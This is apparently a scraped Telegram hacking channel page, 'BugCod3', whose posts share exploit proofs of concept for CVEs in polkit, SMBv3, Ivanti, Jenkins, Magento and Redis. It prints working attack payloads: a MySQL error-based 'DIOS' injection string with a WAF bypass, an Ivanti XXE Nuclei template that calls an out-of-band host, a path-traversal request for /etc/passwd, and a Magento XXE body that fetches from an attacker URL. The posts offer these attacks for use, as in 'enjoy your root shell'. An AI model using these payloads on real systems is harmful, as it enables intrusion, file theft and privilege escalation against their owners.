BugCod3
6.19K subscribers
308 photos
5 videos
7 files
406 links
ɪɴ ᴛʜᴇ ɴᴀᴍᴇ ᴏꜰ ɢᴏᴅ

[ BugCod3 ] — From Shadows To Shells ⚡️

🕶 Hacking | 🐞 Bug Bounty | 🔐 Security Tools
⚔️ Learn • Hunt • Dominate

🌐 Group: t.iss.one/BugCod3GP
📂 Topic: t.iss.one/BugCod3Topic

🤖 Contact: t.iss.one/BugCod3BOT
📧 Email: [email protected]
Download Telegram
CVE-2021-4034

One day for the polkit privilege escalation exploit

Just execute make, ./cve-2021-4034 and enjoy your root shell.

GitHub

#CVE #POC

👤 t.iss.one/MRvirusIRBOT
📢 t.iss.one/BugCod3
This media is not supported in your browser
VIEW IN TELEGRAM
CVE-2020-0796 Remote overflow POC

CVE-2020–0796, is pre-remote code execution vulnerability that resides in the Server Message Block 3.0 (SMBv3) network communication protocol

Which devices does the CVE-2020-0796 affect?

+ Windows 10 Version 1903 for 32-bit Systems

+ Windows 10 Version 1903 for ARM64-based Systems

+ Windows 10 Version 1903 for x64-based Systems

+ Windows 10 Version 1909 for 32-bit Systems

+ Windows 10 Version 1909 for ARM64-based Systems

+ Windows 10 Version 1909 for x64-based Systems

+ Windows Server, version 1903 (Server Core installation)

+ Windows Server, version 1909 (Server Core installation)


GitHub
GitHub

#CVE #Microsoft #POC

👤 t.iss.one/MRvirusIRBOT
📢 t.iss.one/BugCod3
😈 SQL 😈

👼 Dios Bypass Waf 👼

⬇️ Download

🔒
 BugCod3


#SQL #Dios #Bypass #Waf #POC

👤 t.iss.one/BugCod3BOT
📢 t.iss.one/BugCod3
Please open Telegram to view this post
VIEW IN TELEGRAM
21👍1
Advance Error Based My SQL 5.5 (DIOS)

/Bypass My SQL 5.5 version dump database error/

DIOS:
and(select+x*1E308+from(select+concat(@:=0,(select+count(*)from+information_schema.tables+where+table_schema=database()+and@:=concat(@,0x0b,table_name)),@)x)y)


#SQL #Dios #Bypass #POC

👤 t.iss.one/BugCod3BOT
📢 t.iss.one/BugCod3
31
Nuclei PoC for Ivanti XXE (CVE-2024-22024)

id: CVE-2024-22024

info:
name: Ivanti Connect Secure - XXE
author: watchTowr
severity: high
description: |
Ivanti Connect Secure is vulnerable to XXE (XML External Entity) injection.
impact: |
Successful exploitation of this vulnerability could lead to unauthorized access to sensitive information or remote code execution.
remediation: |
Apply the latest security patches or updates provided by Ivanti to fix the XXE vulnerability.
reference:
- https://labs.watchtowr.com/are-we-now-part-of-ivanti/
- https://twitter.com/h4x0r_dz/status/1755849867149103106/photo/1
metadata:
max-request: 1
vendor: ivanti
product: "connect_secure"
shodan-query: "html:\"welcome.cgi?p=logo\""
tags: cve,cve2024,kev,xxe,ivanti

variables:
payload: '<?xml version="1.0" ?><!DOCTYPE root [<!ENTITY % watchTowr SYSTEM
"https://{{interactsh-url}}/x"> %watchTowr;]><r></r>'

http:
- raw:
- |
POST /dana-na/auth/saml-sso.cgi HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded

SAMLRequest={{base64(payload)}}

matchers-condition: and
matchers:
- type: word
part: interactsh_protocol # Confirms the DNS Interaction
words:
- "dns"

- type: word
part: body
words:
- '/dana-na/'
- 'WriteCSS'
condition: and
# digest: 490a0046304402206a39800bff0d9ca85a05e3686a0e246f8d5504a38e8501a1d7e8684ae6f2853002205ba7c74bb1f99cacf693e8a5a1cd429dcd7e52fab188beb8c95b934e4aabcd57:922c64590222798bb761d5b6d8e72950


#Nuclei #Templates #PoC #XXE

👤 t.iss.one/BugCod3BOT
📣 t.iss.one/BugCod3
Please open Telegram to view this post
VIEW IN TELEGRAM
2🤔21❤‍🔥1👍1
🦇 CVE-2024-23897 | Jenkins <= 2.441 & <= LTS 2.426.2 PoC and scanner 🦇

💬 Description:
Exploitation and scanning tool specifically designed for Jenkins versions <= 2.441 & <= LTS 2.426.2. It leverages CVE-2024-23897 to assess and exploit vulnerabilities in Jenkins instances.

💻 Usage:
Ensure you have the necessary permissions to scan and exploit the target systems. Use this tool responsibly and ethically.
python CVE-2024-23897.py -t <target> -p <port> -f <file>

or
python CVE-2024-23897.py -i <input_file> -f <file>


📊 Parameters:
⚪️ -t or --target: Specify the target IP(s). Supports single IP, IP range, comma-separated list, or CIDR block.

⚪️ -i or --input-file: Path to input file containing hosts in the format of https://1.2.3.4:8080/ (one per line).

⚪️ -o or --output-file: Export results to file (optional).

⚪️ -p or --port: Specify the port number. Default is 8080 (optional).

⚪️ -f or --file: Specify the file to read on the target system.

😸 Github

⬇️ Download
🔒 BugCod3

#CVE #PoC #Scanner

👤 t.iss.one/BugCod3BOT
📣 t.iss.one/BugCod3
Please open Telegram to view this post
VIEW IN TELEGRAM
43🔥1
The part of the PoC that must be encoded. This is how it is done if you haven't found a way to do it yet.

GET /%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f../etc/passwd

#PoC #Pyaload

👤 t.iss.one/BugCod3BOT
📣 t.iss.one/BugCod3
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥322👍1
CVE-2024-34102 POC

POST /rest/V1/guest-carts/1/estimate-shipping-methods HTTP/2

{"address":{"totalsCollector":{"collectorList":{"totalCollector":{"sourceData":{"data":"https://attacker*com/xxe.xml","dataIsURL":true,"options":1337}}}}}}

#CVE #POC

👤 t.iss.one/BugCod3BOT
📣 t.iss.one/BugCod3
Please open Telegram to view this post
VIEW IN TELEGRAM
2🔥21
[webapps] Birth Chart Compatibility WordPress Plugin 2.0 - Full Path Disclosure
Birth Chart Compatibility WordPress Plugin 2.0 - Full Path Disclosure

🔗 Read more

#BugCod3 #security #bugbounty #infosec #exploitdb #exploit #poc

👤 t.iss.one/BugCod3BOT
📣 t.iss.one/BugCod3
🔥3❤‍🔥11
Researchers discovered a critical Redis vulnerability called RediShell 🗡

(CVE-2025-49844) a CVSS 10 remote code execution flaw affecting all Redis versions. It allows attackers to send a malicious Lua script, escape the sandbox, and execute code on the host. Around 330,000 Redis instances are exposed online, 60,000 of them without authentication, and over 75% of cloud environments use Redis⚡️

CVE-2025-49844 (RediShell) POC 🛡

Github

#cve #poc #exploit #redishell #redis

Join Exploit Forge 🔝
Join Exploit Forge Forum 👑
Join BugCod3 🤝
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥7❤‍🔥321